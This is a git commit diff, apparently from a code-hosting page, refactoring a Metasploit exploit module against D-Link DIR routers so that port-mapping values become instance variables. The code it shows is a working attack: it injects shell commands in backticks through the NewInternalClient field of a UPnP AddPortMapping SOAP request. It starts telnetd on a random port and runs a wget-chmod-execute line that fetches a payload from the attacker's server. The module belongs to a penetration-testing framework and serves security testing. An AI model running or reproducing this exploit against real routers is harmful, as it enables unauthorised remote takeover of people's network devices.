Use instance variables
parent
e93eef4534
commit
4beea52449
|
@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
new_portmapping_description = rand_text_alpha(8)
|
@new_portmapping_descr = rand_text_alpha(8)
|
||||||
new_external_port = rand(65535)
|
@new_external_port = rand(65535)
|
||||||
new_internal_port = rand(65535)
|
@new_internal_port = rand(65535)
|
||||||
|
|
||||||
if target.name =~ /CMD/
|
if target.name =~ /CMD/
|
||||||
exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_cmd
|
||||||
elsif target.name =~ /Telnet/
|
elsif target.name =~ /Telnet/
|
||||||
exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_telnet
|
||||||
else
|
else
|
||||||
exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
|
exploit_mips
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_cmd
|
||||||
if not (datastore['CMD'])
|
if not (datastore['CMD'])
|
||||||
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
||||||
end
|
end
|
||||||
cmd = payload.encoded
|
cmd = payload.encoded
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
|
print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_telnet
|
||||||
telnetport = rand(65535)
|
telnetport = rand(65535)
|
||||||
|
|
||||||
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
|
||||||
|
|
||||||
cmd = "telnetd -p #{telnetport}"
|
cmd = "telnetd -p #{telnetport}"
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
|
@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit_mips(new_external_port, new_internal_port, new_portmapping_description)
|
def exploit_mips
|
||||||
|
|
||||||
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
|
||||||
|
|
||||||
|
@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
|
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}"
|
||||||
type = "add"
|
type = "add"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
|
||||||
end
|
end
|
||||||
|
@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_file_for_cleanup("/tmp/#{filename}")
|
register_file_for_cleanup("/tmp/#{filename}")
|
||||||
|
|
||||||
type = "delete"
|
type = "delete"
|
||||||
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
res = request(cmd, type)
|
||||||
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/)
|
||||||
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
|
def request(cmd, type)
|
||||||
|
|
||||||
uri = '/soap.cgi'
|
uri = '/soap.cgi'
|
||||||
|
|
||||||
|
@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
|
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
|
||||||
|
|
||||||
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
||||||
data_cmd << "<NewPortMappingDescription>#{new_portmapping_description}</NewPortMappingDescription>"
|
data_cmd << "<NewPortMappingDescription>#{@new_portmapping_descr}</NewPortMappingDescription>"
|
||||||
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
|
data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
|
||||||
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
|
data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
|
||||||
data_cmd << "<NewEnabled>1</NewEnabled>"
|
data_cmd << "<NewEnabled>1</NewEnabled>"
|
||||||
data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
|
data_cmd << "<NewExternalPort>#{@new_external_port}</NewExternalPort>"
|
||||||
data_cmd << "<NewRemoteHost></NewRemoteHost>"
|
data_cmd << "<NewRemoteHost></NewRemoteHost>"
|
||||||
data_cmd << "<NewProtocol>TCP</NewProtocol>"
|
data_cmd << "<NewProtocol>TCP</NewProtocol>"
|
||||||
data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
|
data_cmd << "<NewInternalPort>#{@new_internal_port}</NewInternalPort>"
|
||||||
data_cmd << "</m:AddPortMapping>"
|
data_cmd << "</m:AddPortMapping>"
|
||||||
else
|
else
|
||||||
#we should clean it up ... otherwise we are not able to exploit it multiple times
|
#we should clean it up ... otherwise we are not able to exploit it multiple times
|
||||||
|
@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
|
soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping"
|
||||||
|
|
||||||
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
data_cmd << "<m:DeletePortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
|
||||||
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
|
data_cmd << "<NewProtocol>TCP</NewProtocol><NewExternalPort>#{@new_external_port}</NewExternalPort><NewRemoteHost></NewRemoteHost>"
|
||||||
data_cmd << "</m:DeletePortMapping>"
|
data_cmd << "</m:DeletePortMapping>"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue